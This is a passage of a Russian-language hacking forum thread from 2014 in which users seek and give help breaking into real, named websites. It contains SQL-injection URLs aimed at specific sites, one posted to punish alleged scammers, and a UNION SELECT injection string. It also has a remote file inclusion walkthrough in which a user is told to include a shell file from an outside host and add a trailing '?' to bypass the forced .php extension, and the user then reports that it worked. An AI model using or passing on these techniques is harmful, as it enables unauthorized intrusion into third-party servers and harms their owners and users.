HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #23481  
Старый 20.04.2014, 21:41
Unknowhacker
Guest
Сообщений: n/a
Провел на форуме:
94006

Репутация: 24
По умолчанию

Кто может помочь подобрать столбцы на Jooml'e

Код:
Code:
http://kinokerch.ru/index.php?option=com_datsogallery&Itemid=30&limitstart=20'
Ребят, надо проучить кидал..

Код:
Code:
http://shop-console.com.ua/contact%27
Кидала
 
Ответить с цитированием

  #23482  
Старый 01.05.2014, 21:51
korih
Guest
Сообщений: n/a
Провел на форуме:
1684

Репутация: 0
По умолчанию

Добрый вечер. нашёл на сайте RFI. но есть одно НО.

к примеру ссылка вида http://site.com/index.php?id=user и при добавлении лишнего символа выдаётся:

"Warning: include(user'.php) [function.include]: failed to open stream: No such file or directory in..."

как видите сервер добавляет обязательное расширение ".php".

вопрос следущий: можно ли как-нибудь выполнить shell что бы он выполнялся на стороне жертвы? 0 байт не проходит. посоветовали - со своего сервера отдать файл с расширением .php как простой текст. как это можно сделать?
 
Ответить с цитированием

  #23483  
Старый 01.05.2014, 22:14
smirk
Guest
Сообщений: n/a
Провел на форуме:
45774

Репутация: 26
По умолчанию

Цитата:
Сообщение от korih  
korih said:
Добрый вечер. нашёл на сайте RFI. но есть одно НО.
к примеру ссылка вида http://site.com/index.php?id=user и при добавлении лишнего символа выдаётся:
"Warning: include(user'.php) [function.include]: failed to open stream: No such file or directory in..."
как видите сервер добавляет обязательное расширение ".php".
вопрос следущий: можно ли как-нибудь выполнить shell что бы он выполнялся на стороне жертвы? 0 байт не проходит. посоветовали - со своего сервера отдать файл с расширением .php как простой текст. как это можно сделать?
если действительно rfi, то подставь вот эту ссылку http://hastebin.com/raw/iwafoxapuw вместо user и посмотри выведет ли phpinfo
 
Ответить с цитированием

  #23484  
Старый 01.05.2014, 22:21
korih
Guest
Сообщений: n/a
Провел на форуме:
1684

Репутация: 0
По умолчанию

PHP Version 5.1.6

да, вывело
 
Ответить с цитированием

  #23485  
Старый 01.05.2014, 22:25
smirk
Guest
Сообщений: n/a
Провел на форуме:
45774

Репутация: 26
По умолчанию

Цитата:
Сообщение от korih  
korih said:
PHP Version 5.1.6
да, вывело
ну вот, дальше уже сам =)
 
Ответить с цитированием

  #23486  
Старый 01.05.2014, 22:27
korih
Guest
Сообщений: n/a
Провел на форуме:
1684

Репутация: 0
По умолчанию

Цитата:
Сообщение от smirk  
smirk said:
ну вот, дальше уже сам =)
а как мне сделать, что бы выполняло php код со стороны жертвы, а не моего сервера? объясни пожалуйста) потому что когда я делаю инклуд на php файл своего сервера, то он выполняется на моём сервере. *txt я не могу поставить расширение т.к. сайт жертвы добавляет *.php
 
Ответить с цитированием

  #23487  
Старый 01.05.2014, 22:40
Unknown
Guest
Сообщений: n/a
Провел на форуме:
16399

Репутация: 10
По умолчанию

Предложи ему такую ссылку:

http://elitehacker.ru/shell.txt?

(с вопросом на конце)

есле помог жми +
 
Ответить с цитированием

  #23488  
Старый 01.05.2014, 22:53
korih
Guest
Сообщений: n/a
Провел на форуме:
1684

Репутация: 0
По умолчанию

Цитата:
Сообщение от Ganz Euler  
Ganz Euler said:
Предложи ему такую ссылку:
http://elitehacker.ru/shell.txt?
(с вопросом на конце)
есле помог жми +
не видит. этот сайт не видет даже в браузере) но за попытку спасибо
 
Ответить с цитированием

  #23489  
Старый 01.05.2014, 22:59
korih
Guest
Сообщений: n/a
Провел на форуме:
1684

Репутация: 0
По умолчанию

пошло-поехало! ура! действительно, всё что надо было, это поставить в конце "?". спасибо большое Ganz Euler)
 
Ответить с цитированием

  #23490  
Старый 06.05.2014, 16:03
LelouchMe
Guest
Сообщений: n/a
Провел на форуме:
6667

Репутация: 0
По умолчанию

Ребят, помогите - нашел уязвимость с 6 полями, но выводить их не хочет...

Слепая ли это и как раскрутить правильно...

http://po.poltava.ua/main.php?l=1+UNION+SELECT+1,2,3,4,5,6--

спасибо...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ